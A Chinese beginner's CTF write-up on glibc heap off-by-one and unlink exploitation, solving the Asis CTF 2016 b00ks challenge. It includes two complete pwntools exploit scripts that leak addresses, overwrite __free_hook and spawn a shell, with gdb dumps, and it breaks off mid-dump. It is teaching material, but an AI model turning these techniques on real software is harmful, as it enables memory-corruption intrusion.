因为自己学堆的时候,找不到一个系统的教程,我将会按照ctf-wiki的目录一步步学下去,尽量做到每周有更新,方便跟我一样刚入门堆的人学习,第一篇教程研究了4天吧,途中没人指导。。很尴尬,自己一个很容易的点研究了很久才懂,把踩过的坑也总结下,方便后人不再踩坑
学习链接
环境搭建
off by one原理(引用ctf-wiki)
off-by-one 是指单字节缓冲区溢出,这种漏洞的产生往往与边界验证不严和字符串操作有关,当然也不排除写入的 size 正好就只多了一个字节的情况。其中边界验证不严通常包括
使用循环语句向堆块中写入数据时,循环的次数设置错误(这在 C 语言初学者中很常见)导致多写入了一个字节。
字符串操作不合适
一般来说,单字节溢出被认为是难以利用的,但是因为 Linux 的堆管理机制 ptmalloc 验证的松散性,基于 Linux 堆的 off-by-one 漏洞利用起来并不复杂,并且威力强大。 此外,需要说明的一点是 off-by-one 是可以基于各种缓冲区的,比如栈、bss 段等等,但是堆上(heap based) 的 off-by-one 是 CTF 中比较常见的。我们这里仅讨论堆上的 off-by-one 情况。
off-by-one 利用思路(引用ctf-wiki)
溢出字节为可控制任意字节:通过修改大小造成块结构之间出现重叠,从而泄露其他块数据,或是覆盖其他块数据。也可使用 NULL 字节溢出的方法
溢出字节为 NULL 字节:在 size 为 0x100 的时候,溢出 NULL 字节可以使得 prev_in_use 位被清,这样前块会被认为是 free 块。(1) 这时可以选择使用 unlink 方法(见 unlink 部分)进行处理。(2) 另外,这时 prev_size 域就会启用,就可以伪造 prev_size ,从而造成块之间发生重叠。此方法的关键在于 unlink 的时候没有检查按照 prev_size 找到的块的后一块(理论上是当前正在 unlink 的块)与当前正在 unlink 的块大小是否相等。
off by one 自己理解
其实就是程序员不小心,我们自己刚写代码的时候也是那样,经常会搞错,比如如下c代码
#include <stdio.h> #include <malloc.h> int main() { char str[5]={0}; str[5] = '\0'; return 0; }
这段代码相信类似的,我们都写过,我们数组最高是
数组总长为5,数组下标从0开始,最大为4,而我们错误地使用了str[5],造成越界写了一个字节,这就是off-by-one,可这个开始我也没懂这个的强大,直到做了一道题目
Asis CTF 2016 b00ks
ctf-wiki上用了两种方法解这道题,我也就照着他的exp,一步步调试,没注释就慢慢理解,搞定了,他有纯利用off-by-one的,也有同时利用unlink跟off-by-one的,下面对这两种方法进行解释
先指出ida解析错误部分
if ( v3 ) { *(v3 + 6) = v1; *(off_202010 + v2) = v3; *(v3 + 2) = v5; *(v3 + 1) = ptr; *v3 = ++unk_202024; return 0LL; }
这个v3加6是错误的偏移,应该是v3+3,具体看汇编代码就可以了
text:0000000000001122 ; 48: *(v3 + 6) = v1; .text:0000000000001122 .text:0000000000001122 loc_1122: ; CODE XREF: Create+1B8↑j .text:0000000000001122 mov eax, [rbp+var_20] .text:0000000000001125 mov edx, eax .text:0000000000001127 mov rax, [rbp+var_18] .text:000000000000112B mov [rax+18h], edx .text:000000000000112E ; 49: *(off_202010 + v2) = v3; .text:000000000000112E lea rax, off_202010 .text:0000000000001135 mov rax, [rax] .text:0000000000001138 mov edx, [rbp+var_1C] .text:000000000000113B movsxd rdx, edx .text:000000000000113E shl rdx, 3 .text:0000000000001142 add rdx, rax .text:0000000000001145 mov rax, [rbp+var_18] .text:0000000000001149 mov [rdx], rax .text:000000000000114C ; 50: *(v3 + 2) = v5; .text:000000000000114C mov rax, [rbp+var_18] .text:0000000000001150 mov rdx, [rbp+var_8] .text:0000000000001154 mov [rax+10h], rdx .text:0000000000001158 ; 51: *(v3 + 1) = ptr; .text:0000000000001158 mov rax, [rbp+var_18] .text:000000000000115C mov rdx, [rbp+ptr] .text:0000000000001160 mov [rax+8], rdx .text:0000000000001164 ; 52: *v3 = ++unk_202024; .text:0000000000001164 lea rax, unk_202024 .text:000000000000116B mov eax, [rax] .text:000000000000116D lea edx, [rax+1] .text:0000000000001170 lea rax, unk_202024 .text:0000000000001177 mov [rax], edx .text:0000000000001179 lea rax, unk_202024 .text:0000000000001180 mov edx, [rax] .text:0000000000001182 mov rax, [rbp+var_18] .text:0000000000001186 mov [rax], edx .text:0000000000001188 mov eax, 0
看每段的mov语句,
- 第一段是mov [rax+18h],edx对应v3+6?
- 第二段不看,加了变量
- 第三段是mov [rax+10h],rdx对应v3+2?
off-by-one 攻击过程
出现这个漏洞的函数在这
signed __int64 __fastcall sub_9F5(_BYTE *a1, int a2) { int i; // [rsp+14h] [rbp-Ch] _BYTE *buf; // [rsp+18h] [rbp-8h] if ( a2 <= 0 ) return 0LL; buf = a1; for ( i = 0; ; ++i ) { if ( read(0, buf, 1uLL) != 1 ) return 1LL; if ( *buf == 10 ) break; ++buf; if ( i == a2 ) break; } *buf = 0; //危险部分 return 0LL; }
他由于没考虑好边界条件,多写了一个0到末尾
书本结构体
struct book{ int id; char *name; char *description; int size; }
攻击过程
我先说明下攻击过程,下面的讲解会围绕这个攻击过程来
- 填充满author
- 创建堆块1,覆盖author结尾的\x00,这样我们输出的时候就可以泄露堆块1的地址
- 创建堆块2,为后续做准备,堆块2要申请得比较大,因为mmap申请出来的堆块地址与libc有固定的偏移
- 泄露堆块1地址,记为first_heap
- (关键点来了) 这时候的攻击思路是利用编辑author的时候多写了一个\x00字节,可以覆盖到堆块1的地址的最后一位,如果我们提前将堆块1的内容编辑好,按照上述的结构体布置好,name和description我们自己控制,伪造成一个书本的结构体,然后让覆盖过后的地址刚好是book1的description部分的话,我们相当于获得了一个任意地址读写的能力啊
- 后面就简单了,任意读取获得libc地址
- 任意写将__free_hook函数的地址改写成one_gadget地址
tips:__free_hook若没有则不调用,若有将先于free函数调用
先贴上exp,没有代码,没有调试就没有灵魂
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from PwnContext.core import * # Set up pwntools for the correct architecture elf = context.binary = ELF('b00ks') LIBC = args.LIBC or 'libc.so.6' local = 1 host = args.HOST or '127.0.0.1' port = int(args.PORT or 1080) ctx.binary = 'b00ks' ctx.remote_libc = LIBC ctx.debug_remote_libc = True if ctx.debug_remote_libc == False: libc = elf.libc else: libc = ctx.remote_libc if local: context.log_level = 'debug' io = ctx.start() else: io = remote(host,port) def cmd(choice): io.recvuntil(">") io.sendline(str(choice)) def create(book_size, book_name, desc_size, desc): cmd(1) io.sendlineafter(": ", str(book_size)) io.recvuntil(": ") if len(book_name) == book_size:#deal with overflow io.send(book_name) else: io.sendline(book_name) io.recvuntil(": ") io.sendline(str(desc_size)) if len(desc) == desc_size: io.send(desc) else: io.sendline(desc) def remove(idx): cmd(2) io.sendlineafter(": ", str(idx)) def edit(idx, desc): cmd(3) io.sendlineafter(": ", str(idx)) io.sendlineafter(": ", str(desc)) def printbook(id): io.readuntil("> ") io.sendline("4") io.readuntil(": ") for i in range(id): book_id = int(io.readline()[:-1]) io.readuntil(": ") book_name = io.readline()[:-1] io.readuntil(": ") book_des = io.readline()[:-1] io.readuntil(": ") book_author = io.readline()[:-1] return book_id, book_name, book_des, book_author def author_name(name): cmd(5) io.sendlineafter(": ", str(name)) def exp(): io.sendlineafter(": ", "author".rjust(0x20,'a')) create(48, '1a', 240, '1b') #1 create(0x21000, '2a', 0x21000, '2b')#2 book_id_1, book_name, book_des, book_author = printbook(1) first_heap = u64(book_author[32:32+6].ljust(8,'\x00')) io.success('first_heap: 0x%x' % first_heap) gdb.attach(io) payload = 'a'*0xa0 + p64(1) + p64(first_heap + 0x38) + p64(first_heap + 0x40) + p64(0xffff) edit(1, payload) author_name("author".rjust(0x20,'a')) book_id_1, book_name, book_des, book_author = printbook(1) book2_name_addr = u64(book_name.ljust(8,'\x00')) book2_des_addr = u64(book_des.ljust(8, '\x00')) io.success("book2 name addr: 0x%x" % book2_name_addr) io.success("book2 des addr: 0x%x" % book2_des_addr) libc_base = book2_des_addr - 0x5a8010 io.success("libc_base: 0x%x" % libc_base) free_hook = libc_base + libc.symbols['__free_hook'] offset = 0x45216 offset = 0x4526a #offset = 0xf02a4 #offset = 0xf1147 one_gadget = libc_base + offset io.success("free_hook addr: 0x%x" % free_hook) io.success("one_gadget addr: 0x%x" % one_gadget) payload = p64(free_hook) edit(1, payload) edit(2, p64(one_gadget)) remove(2) if __name__ == '__main__': exp() io.interactive()
我只讲解exp函数内的内容,外面的那些只是为了方便堆块的申请,输出,删除什么的,堆题建议都写成函数,因为将会有大量重复动作
填满author
io.sendlineafter(": ", "author".rjust(0x20,'a'))
具体查找author位置可以跟我一样,find 字符串
gdb-peda$ find author Searching for 'author' in: None ranges Found 8 results, display max 8 items: b00ks_debug : 0x555b3bcd83e1 ("author name") b00ks_debug : 0x555b3bcd8401 ("author name: ") b00ks_debug : 0x555b3bcd841c ("author_name") b00ks_debug : 0x555b3bed83e1 ("author name") b00ks_debug : 0x555b3bed8401 ("author name: ") b00ks_debug : 0x555b3bed841c ("author_name") b00ks_debug : 0x555b3bed905a --> 0xa160726f68747561 [stack] : 0x7ffed60b6406 ("author name: ")
这是创建一个堆块过后的效果,第三行便是book1结构体地址
gdb-peda$ x/20gx 0x555b3bed905a-0x2-0x18 0x555b3bed9040: 0x6161616161616161 0x6161616161616161 0x555b3bed9050: 0x6161616161616161 0x726f687475616161 0x555b3bed9060: 0x0000555b3bf8a160 0x0000000000000000 0x555b3bed9070: 0x0000000000000000 0x0000000000000000 0x555b3bed9080: 0x0000000000000000 0x0000000000000000 0x555b3bed9090: 0x0000000000000000 0x0000000000000000 0x555b3bed90a0: 0x0000000000000000 0x0000000000000000 0x555b3bed90b0: 0x0000000000000000 0x0000000000000000 0x555b3bed90c0: 0x0000000000000000 0x0000000000000000 0x555b3bed90d0: 0x0000000000000000 0x0000000000000000
创建堆块1
相信我,这里是这道题最难的地方,过了这个坎就很简单了,每个人环境不同,处理的结果也不一样,所以自行调试,在这里我能给你的建议就是将description申请大一点,泄露部分不需要这里大小控制,先不讲,你先调试到能泄露就行
泄露地址
这个不多讲
通过edit伪造book结构体
payload = 'a'*0xa0 + p64(1) + p64(first_heap + 0x38) + p64(first_heap + 0x40) + p64(0xffff) edit(1, payload)
这前面的偏移是看个人环境的,网上的很多没有偏移,在我电脑环境上做不到,我通过这个偏移能刚好对齐,具体调试过程就是繁杂的了,总之,你要让你覆盖掉堆块1的地址那部分,刚好在book1的description指针指向的空间里,这样你才能自行伪造结构体
比如
我泄露出来的第一个堆块地址为这个[+] first_heap: 0x55b6b5d72160
那这时候我覆盖过后地址就变成[+] first_heap: 0x55b6b5d72100,你要让0x55b6b5d72100在description指向的空间内就成了,建议将description申请的大一些,这样容易做到,这部分跟创建堆块1是结合起来的,你看我创建的大小在你那不一定准确
这时候再次利用off by one
author_name("author".rjust(0x20,'a'))
将地址最低位覆盖成\x00,这样我们我们的那个堆块1的指针就指向了我们自己伪造的结构体了,这个结构体description和name我们指向了book2结构体,这样我们通过编辑堆块1的description就能改掉book2的结构体的description指针和name指针,我们能编辑book2的description,相当于任意写了
这里部分就只是泄露了
book_id_1, book_name, book_des, book_author = printbook(1) book2_name_addr = u64(book_name.ljust(8,'\x00')) book2_des_addr = u64(book_des.ljust(8, '\x00')) io.success("book2 name addr: 0x%x" % book2_name_addr) io.success("book2 des addr: 0x%x" % book2_des_addr) libc_base = book2_des_addr - 0x5a8010 io.success("libc_base: 0x%x" % libc_base) free_hook = libc_base + libc.symbols['__free_hook'] offset = 0x45216 offset = 0x4526a #offset = 0xf02a4 #offset = 0xf1147 one_gadget = libc_base + offset io.success("free_hook addr: 0x%x" % free_hook) io.success("one_gadget addr: 0x%x" % one_gadget)
这里那个固定偏移,第一部分libc_base我是通过vmmap获得libc基地址,然后我调试的时候减一下就获得这个固定偏移了
gdb-peda$ vmmap Start End Perm Name 0x0000564350ee5000 0x0000564350ee7000 r-xp /tmp/pwn/b00ks_debug 0x00005643510e6000 0x00005643510e7000 r--p /tmp/pwn/b00ks_debug 0x00005643510e7000 0x00005643510e8000 rw-p /tmp/pwn/b00ks_debug 0x0000564351cdd000 0x0000564351cff000 rw-p [heap] 0x00007f2805862000 0x00007f2805a22000 r-xp /home/greenhand/Desktop/heap/off_by_one/Asis_2016_b00ks/libc.so.6 0x00007f2805a22000 0x00007f2805c22000 ---p /home/greenhand/Desktop/heap/off_by_one/Asis_2016_b00ks/libc.so.6 0x00007f2805c22000 0x00007f2805c26000 r--p /home/greenhand/Desktop/heap/off_by_one/Asis_2016_b00ks/libc.so.6 0x00007f2805c26000 0x00007f2805c28000 rw-p /home/greenhand/Desktop/heap/off_by_one/Asis_2016_b00ks/libc.so.6 0x00007f2805c28000 0x00007f2805c2c000 rw-p mapped 0x00007f2805c2c000 0x00007f2805c52000 r-xp /tmp/ld.so.2 0x00007f2805e0a000 0x00007f2805e51000 rw-p mapped 0x00007f2805e51000 0x00007f2805e52000 r--p /tmp/ld.so.2 0x00007f2805e52000 0x00007f2805e53000 rw-p /tmp/ld.so.2 0x00007f2805e53000 0x00007f2805e54000 rw-p mapped 0x00007ffd06df4000 0x00007ffd06e15000 rw-p [stack] 0x00007ffd06edc000 0x00007ffd06edf000 r--p [vvar] 0x00007ffd06edf000 0x00007ffd06ee1000 r-xp [vdso]
在heap下面权限为r-xp的start部分的地址就是libc基地址了,
然后任选一个泄露的
[+] book2 name addr: 0x7f2805e2c010
[+] book2 des addr: 0x7f2805e0a010
我选了description部分的
└──╼ $python Python 2.7.16 (default, Apr 6 2019, 01:42:57) [GCC 8.3.0] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> hex(0x7f2805e0a010-0x00007f2805862000) '0x5a8010' >>>
就是这个固定偏移了
至于libc跟one_gadget偏移,用工具吧one_gadget
最后任意地址写
- 先编辑book1的description改成free_hook地址,就是将book2的description指针指向free_hook
- 编辑book2的description,就是写入one_gadget了
- 最后在调用一次free就可以getshell了
payload = p64(free_hook) edit(1, payload) edit(2, p64(one_gadget)) remove(2)
unlink原理
void unlink(malloc_chunk P, malloc_chunk BK, malloc_chunk *FD)
{
FD = P->fd;
BK = P->bk;
FD->bk = BK;
BK->fd = FD;}
ctf-wiki讲解原理
我觉得那张图配的十分好,就是双向链表的解链过程,好好理解,不理解没法搞下去
struct chunk{ int pre_size; int size; char *fd; //前驱指针 forward char *bk; // 后继指针 back 数据部分 }
大概就是这样,我创建三个这个结构体,a,b,c连接部分如下图,
链表: a<->b<->c
将b从链表中解链就是unlink
过程:
- FD = b->fd; //实际就是FD=a
- BK = b->bk; //实际就是BK=c
- FD->bk = BK; //就是从a->b变成a->c
- BK->fd = FD; //就是从c->b变成c->a
那unlink为什么能利用,进行攻击呢?我也纠结了这个很久,从ctf-wiki上了解的过去的unlink就不讲了,那时候的攻击方式比较简单,我只讲现今的unlink攻击方式
我们可以通过伪造chunk,让他解链的时候unlink一个我们伪造的chunk,这样的话,我们实际就达到了一个赋值的效果,而具体的效果从例子中讲解吧
unlink攻击过程
- 利用off-by-one覆盖掉结果的null字节,泄露第一个堆块的地址
- 泄露掉后利用unlink,使得堆块4的mem部分的指针指向ptr-0x18处,ptr-0x18为自定义的地址,其实就是堆块4,就是create出来的那个堆块
- 覆盖堆块4的内容,修改了堆块4的description的指针,指向了堆块6的description部分的指针
- 其实第三部分就相当于获得了一个任意地址读写的指针
- 这里有好几次修改容易绕晕,我绕了两天才绕出来,第一次修改的时候是将chunk4整体改写,从开头到description指针,全部改掉,将chunk4的description指向chunk6结构体的description
- 然后第二次编辑的时候就是编辑chunk6结构体的description,这样就可以修改chunk6的description指针指向任意地点
- 利用这个特性输出,输出了libc的地址,具体libc在哪个位置可以通过调试得到
- 利用这个特性任意地址写
先对整体过程有个大概的了解,在一步步讲
过程中的坑
- 开头remove两次是有原因的,这样会让堆块6的结构体在前面几个堆块内,因为堆块同样大小的在free过后在malloc后会再次利用,这样方便我们自己调试查看以及利用
- 调试时候的计算问题,可以用你当时调试出来的减去后两位数字,获得个heap_base这样直接利用heap_base + 偏移比较快计算结果
- 当申请不是16的整数倍的时候,他会转换成16的整数倍,比如我exp中的0x108,实际大小会变成111,还有个1是标记的,他会将下一个chunk的pre_size拿来使用,因为没有free的话,pre_size是没用的,为了不浪费空间,就使用了
exp
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from PwnContext.core import * # Set up pwntools for the correct architecture elf = context.binary = ELF('b00ks') LIBC = args.LIBC or 'libc.so.6' local = 1 host = args.HOST or '127.0.0.1' port = int(args.PORT or 1080) ctx.binary = 'b00ks' ctx.remote_libc = LIBC ctx.debug_remote_libc = True if ctx.debug_remote_libc == False: libc = elf.libc else: libc = ctx.remote_libc if local: context.log_level = 'debug' io = ctx.start() else: io = remote(host,port) def cmd(choice): io.recvuntil(">") io.sendline(str(choice)) def create(book_size, book_name, desc_size, desc): cmd(1) io.sendlineafter(": ", str(book_size)) io.recvuntil(": ") if len(book_name) == book_size:#deal with overflow io.send(book_name) else: io.sendline(book_name) io.recvuntil(": ") io.sendline(str(desc_size)) if len(desc) == desc_size: io.send(desc) else: io.sendline(desc) def remove(idx): cmd(2) io.sendlineafter(": ", str(idx)) def edit(idx, desc): cmd(3) io.sendlineafter(": ", str(idx)) io.sendlineafter(": ", str(desc)) def printf(): cmd(4) def author_name(name): cmd(5) io.sendlineafter(": ", str(name)) def exp(): io.sendlineafter(": ", "author".rjust(0x20,'a')) create(0x20, '11111', 0x20, 'b') #1 printf() io.recvuntil('Author: ') io.recvuntil("author") first_heap = u64(io.recvline().strip().ljust(8, '\x00')) create(0x20, "22222", 0x20, "desc buf") #2 create(0x20, "33333", 0x20, "desc buf") #3 remove(2) remove(3) create(0x20, "33333", 0x108, 'overflow') #4 create(0x20, "44444", 0x100-0x10, 'target') #5 create(0x20, "/bin/sh\x00", 0x200, 'to arbitrary read and write') #6 heap_base = first_heap - 0x80 ptr = heap_base + 0x180 payload = p64(0) + p64(0x101) + p64(ptr-0x18) + p64(ptr-0x10) + '\x00'*0xe0 + p64(0x100) edit(4, payload) remove(5) payload = p64(0x30) + p64(4) + p64(first_heap+0x40)*2 edit(4, payload) edit(4, p64(heap_base + 0x1e0)) printf() for _ in range(3): io.recvuntil('Description: ') content = io.recvline() io.info(content) libc_base = u64(content.strip().ljust(8, '\x00'))-0x3c4b78 io.success("libc_base: 0x%x" % libc_base) system_addr = libc_base + libc.symbols['system'] io.success('system: 0x%x' % system_addr) free_hook = libc_base + libc.symbols['__free_hook'] payload = p64(free_hook) + p64(0x200) edit(4, payload) edit(6, p64(system_addr)) io.success('first_heap: 0x%x' % first_heap) remove(6) #gdb.attach(io) if __name__ == '__main__': exp() io.interactive()
同样,我只讲解exp部分的内容,其余一样是准备工作
填充并泄露堆块1地址
一样的过程,利用off-by-one泄露地址,不讲了,只讲重点
io.sendlineafter(": ", "author".rjust(0x20,'a')) create(0x20, '11111', 0x20, 'b') #1 printf() io.recvuntil('Author: ') io.recvuntil("author") first_heap = u64(io.recvline().strip().ljust(8, '\x00'))
创建堆块并remove掉
create(0x20, "22222", 0x20, "desc buf") #2 create(0x20, "33333", 0x20, "desc buf") #3 remove(2) remove(3)
这里是要将book6的结构体位置放到前面,方便利用,你可以自己去调试试试,不这样做的话,位置很难找,因为他定义的存储这个结构体的大小也是0x20+0x10(数据部分+结构部分)
unlink部分(重点)
create(0x20, "33333", 0x108, 'overflow') #4 create(0x20, "44444", 0x100-0x10, 'target') #5 create(0x20, "/bin/sh\x00", 0x200, 'to arbitrary read and write') #6 heap_base = first_heap - 0x80 ptr = heap_base + 0x180 payload = p64(0) + p64(0x101) + p64(ptr-0x18) + p64(ptr-0x10) + '\x00'*0xe0 + p64(0x100) edit(4, payload) remove(5)
- 创建两个smallchunk,因为unlink只有在smallbin下才可以,fastbin不行
- 最后一个chunk是用来编辑的,以及free的,free的参数要带/bin/sh,就是要将他改写成system函数
- heap_base = first_heap - 0x80这个偏移自己定,每次调试可能都不一样,反正只要对的上你自己调试的时候就行,方便自己计算,我这里调试的时候是
[+] first_heap: 0x56182d174080所以减了0x80
gdb-peda$ x/50gx 0x5653ee7a5080 0x5653ee7a5080: 0x0000000000000001 0x00005653ee7a5020 0x5653ee7a5090: 0x00005653ee7a5050 0x0000000000000020 0x5653ee7a50a0: 0x0000000000000000 0x0000000000000031 0x5653ee7a50b0: 0x0000000000000006 0x00005653ee7a50e0 0x5653ee7a50c0: 0x00005653ee7a53e0 0x0000000000000200 0x5653ee7a50d0: 0x0000000000000000 0x0000000000000031 0x5653ee7a50e0: 0x0068732f6e69622f 0x0000000000000000 0x5653ee7a50f0: 0x0000000000000000 0x0000000000000000 0x5653ee7a5100: 0x0000000000000000 0x0000000000000031 0x5653ee7a5110: 0x0000565300000005 0x00005653ee7a5140 0x5653ee7a5120: 0x00005653ee7a52e0 0x00000000000000f0 0x5653ee7a5130: 0x0000000000000000 0x0000000000000031 0x5653ee7a5140: 0x0000003434343434 0x0000000000000000 0x5653ee7a5150: 0x0000000000000000 0x0000000000000000 0x5653ee7a5160: 0x0000000000000000 0x0000000000000031 0x5653ee7a5170: 0x0000565300000004 0x00005653ee7a51a0 0x5653ee7a5180: 0x00005653ee7a51d0 0x0000000000000108 0x5653ee7a5190: 0x0000000000000000 0x0000000000000031 0x5653ee7a51a0: 0x0000003333333333 0x00005653ee7a5140 0x5653ee7a51b0: 0x00005653ee7a5170 0x0000000000000020 0x5653ee7a51c0: 0x0000000000000000 0x0000000000000111 #chunk4 0x5653ee7a51d0: 0x0000000000000000 0x0000000000000101 #实际可以写部分 0x5653ee7a51e0: 0x00005653ee7a5168 0x00005653ee7a5170 0x5653ee7a51f0: 0x0000000000000000 0x0000000000000000 0x5653ee7a5200: 0x0000000000000000 0x0000000000000000
这是我显示first_heap后的数据,0x5653ee7a51d0便是申请的0x108的chunk,我在这里伪造了一个chunk,fd和bk在0x5653ee7a51e0,然后通过溢出将下个chunk的pre_size改成我这个伪造的chunk大小
在看看相邻的堆块
gdb-peda$ x/50gx 0x5653ee7a51c0 0x5653ee7a51c0: 0x0000000000000000 0x0000000000000111 0x5653ee7a51d0: 0x0000000000000000 0x0000000000000101 #伪造的chunk记为p 0x5653ee7a51e0: 0x00005653ee7a5168 0x00005653ee7a5170 0x5653ee7a51f0: 0x0000000000000000 0x0000000000000000 0x5653ee7a5200: 0x0000000000000000 0x0000000000000000 0x5653ee7a5210: 0x0000000000000000 0x0000000000000000 0x5653ee7a5220: 0x0000000000000000 0x0000000000000000 0x5653ee7a5230: 0x0000000000000000 0x0000000000000000 0x5653ee7a5240: 0x0000000000000000 0x0000000000000000 0x5653ee7a5250: 0x0000000000000000 0x0000000000000000 0x5653ee7a5260: 0x0000000000000000 0x0000000000000000 0x5653ee7a5270: 0x0000000000000000 0x0000000000000000 0x5653ee7a5280: 0x0000000000000000 0x0000000000000000 0x5653ee7a5290: 0x0000000000000000 0x0000000000000000 0x5653ee7a52a0: 0x0000000000000000 0x0000000000000000 0x5653ee7a52b0: 0x0000000000000000 0x0000000000000000 0x5653ee7a52c0: 0x0000000000000000 0x0000000000000000 0x5653ee7a52d0: 0x0000000000000100 0x0000000000000100 #chunk5 0x5653ee7a52e0: 0x0000746567726174 0x0000000000000000 #实际可以写部分 0x5653ee7a52f0: 0x0000000000000000 0x0000000000000000 0x5653ee7a5300: 0x0000000000000000 0x0000000000000000 0x5653ee7a5310: 0x0000000000000000 0x0000000000000000 0x5653ee7a5320: 0x0000000000000000 0x0000000000000000 0x5653ee7a5330: 0x0000000000000000 0x0000000000000000 0x5653ee7a5340: 0x0000000000000000 0x0000000000000000
这时候我remove(5)的话,会变成什么样呢?他会unlink(p),然后将chunk5向前合并,不信试试看,这里数据需要精心构造,才能造成任意写的能力
remove(5)效果,变成了201,这是合并的效果,然后地址部分指向了libc部分的地址,如果我们能泄露这部分地址,就获得libc
还有个重点,我们的unlink过程没显示出来,我们分析下,unlink(p)做了啥
假设我们chunk4数据部分的地址为myptr
这里unlink(p)
- FD = ptr-0x18
- BK = ptr-0x10
- 检测FD->bk==p? && BK->fd == p?
- 检测成功过后
- FD->bk <=> FD+0x18 <=> (ptr-0x18+0x18) = BK = ptr-0x10 实际就是ptr=ptr-0x10
- BK->FD <=> BK+0x10 <=> (ptr-0x10+0x10) = FD = ptr-0x18 实际就是ptr=ptr-0x18
重点在第6行,我们将*ptr改成了ptr-0x18
看ptr是哪里
gdb-peda$ x/10gx 0x5577f976f080-0x80+0x180 0x5577f976f180: 0x00005577f976f168 0x0000000000000108 0x5577f976f190: 0x0000000000000000 0x0000000000000031 0x5577f976f1a0: 0x0000003333333333 0x00005577f976f140 0x5577f976f1b0: 0x00005577f976f170 0x0000000000000020 0x5577f976f1c0: 0x0000000000000000 0x0000000000000111
从整体来看
gdb-peda$ x/50gx 0x5577f976f080 0x5577f976f080: 0x0000000000000001 0x00005577f976f020 0x5577f976f090: 0x00005577f976f050 0x0000000000000020 0x5577f976f0a0: 0x0000000000000000 0x0000000000000031 0x5577f976f0b0: 0x0000000000000006 0x00005577f976f0e0 0x5577f976f0c0: 0x00005577f976f3e0 0x0000000000000200 0x5577f976f0d0: 0x0000000000000000 0x0000000000000031 0x5577f976f0e0: 0x0068732f6e69622f 0x0000000000000000 0x5577f976f0f0: 0x0000000000000000 0x0000000000000000 0x5577f976f100: 0x0000000000000000 0x0000000000000031 0x5577f976f110: 0x00005577f976f130 0x00005577f976f140 0x5577f976f120: 0x00005577f976f2e0 0x00000000000000f0 0x5577f976f130: 0x0000000000000000 0x0000000000000031 0x5577f976f140: 0x0000000000000000 0x0000000000000000 0x5577f976f150: 0x0000000000000000 0x0000000000000000 0x5577f976f160: 0x0000000000000000 0x0000000000000031 0x5577f976f170: 0x0000557700000004 0x00005577f976f1a0 #book4结构体 0x5577f976f180: 0x00005577f976f168 0x0000000000000108 #ptr, 0x5577f976f190: 0x0000000000000000 0x0000000000000031 0x5577f976f1a0: 0x0000003333333333 0x00005577f976f140 0x5577f976f1b0: 0x00005577f976f170 0x0000000000000020 0x5577f976f1c0: 0x0000000000000000 0x0000000000000111 0x5577f976f1d0: 0x0000000000000000 0x0000000000000201 0x5577f976f1e0: 0x00007f452ad38b78 0x00007f452ad38b78 0x5577f976f1f0: 0x0000000000000000 0x0000000000000000 0x5577f976f200: 0x0000000000000000 0x0000000000000000
*ptr = ptr -0x18,也就是0x5577f976f180里的内容改为0x5577f976f168
这样,再次edit(4,payload)的话就可以修改从168开始的size以及name和description指针
合并效果
gdb-peda$ x/50gx 0x5577f976f1c0 0x5577f976f1c0: 0x0000000000000000 0x0000000000000111 0x5577f976f1d0: 0x0000000000000000 0x0000000000000201 0x5577f976f1e0: 0x00007f452ad38b78 0x00007f452ad38b78 0x5577f976f1f0: 0x0000000000000000 0x0000000000000000 0x5577f976f200: 0x0000000000000000 0x0000000000000000 0x5577f976f210: 0x0000000000000000 0x0000000000000000 0x5577f976f220: 0x0000000000000000 0x0000000000000000 0x5577f976f230: 0x0000000000000000 0x0000000000000000 0x5577f976f240: 0x0000000000000000 0x0000000000000000 0x5577f976f250: 0x0000000000000000 0x0000000000000000 0x5577f976f260: 0x0000000000000000 0x0000000000000000 0x5577f976f270: 0x0000000000000000 0x0000000000000000 0x5577f976f280: 0x0000000000000000 0x0000000000000000 0x5577f976f290: 0x0000000000000000 0x0000000000000000 0x5577f976f2a0: 0x0000000000000000 0x0000000000000000 0x5577f976f2b0: 0x0000000000000000 0x0000000000000000 0x5577f976f2c0: 0x0000000000000000 0x0000000000000000 0x5577f976f2d0: 0x0000000000000100 0x0000000000000100 0x5577f976f2e0: 0x0000746567726174 0x0000000000000000 0x5577f976f2f0: 0x0000000000000000 0x0000000000000000 0x5577f976f300: 0x0000000000000000 0x0000000000000000 0x5577f976f310: 0x0000000000000000 0x0000000000000000 0x5577f976f320: 0x0000000000000000 0x0000000000000000 0x5577f976f330: 0x0000000000000000 0x0000000000000000 0x5577f976f340: 0x0000000000000000 0x0000000000000000
再次修改book4的结构体
payload = p64(0x30) + p64(4) + p64(first_heap+0x40)*2 edit(4, payload) edit(4, p64(heap_base + 0x1e0)) printf() for _ in range(3): io.recvuntil('Description: ') content = io.recvline() io.info(content) libc_base = u64(content.strip().ljust(8, '\x00'))-0x3c4b7 io.success("libc_base: 0x%x" % libc_base) system_addr = libc_base + libc.symbols['system'] io.success('system: 0x%x' % system_addr) free_hook = libc_base + libc.symbols['__free_hook']
0x30是他原来大小,4为id 4, 然后我将name和description指针都改为first_heap+0x40处,为什么是这里呢?因为,这里是book6的结构体部分的description部分指针,这样就获得了任意地址读写的能力,
第二次edit(4, p64(heap_base + 0x1e0))的时候就是将book6的description指针改成指向heap_base + 0x1e0处,为什么是这里,看上面
从整体来看
gdb-peda$ x/50gx 0x5577f976f080 0x5577f976f080: 0x0000000000000001 0x00005577f976f020 0x5577f976f090: 0x00005577f976f050 0x0000000000000020 0x5577f976f0a0: 0x0000000000000000 0x0000000000000031 0x5577f976f0b0: 0x0000000000000006 0x00005577f976f0e0 0x5577f976f0c0: 0x00005577f976f3e0 0x0000000000000200 0x5577f976f0d0: 0x0000000000000000 0x0000000000000031 0x5577f976f0e0: 0x0068732f6e69622f 0x0000000000000000 0x5577f976f0f0: 0x0000000000000000 0x0000000000000000 0x5577f976f100: 0x0000000000000000 0x0000000000000031 0x5577f976f110: 0x00005577f976f130 0x00005577f976f140 0x5577f976f120: 0x00005577f976f2e0 0x00000000000000f0 0x5577f976f130: 0x0000000000000000 0x0000000000000031 0x5577f976f140: 0x0000000000000000 0x0000000000000000 0x5577f976f150: 0x0000000000000000 0x0000000000000000 0x5577f976f160: 0x0000000000000000 0x0000000000000031 0x5577f976f170: 0x0000557700000004 0x00005577f976f1a0 0x5577f976f180: 0x00005577f976f168 0x0000000000000108 0x5577f976f190: 0x0000000000000000 0x0000000000000031 0x5577f976f1a0: 0x0000003333333333 0x00005577f976f140 0x5577f976f1b0: 0x00005577f976f170 0x0000000000000020 0x5577f976f1c0: 0x0000000000000000 0x0000000000000111 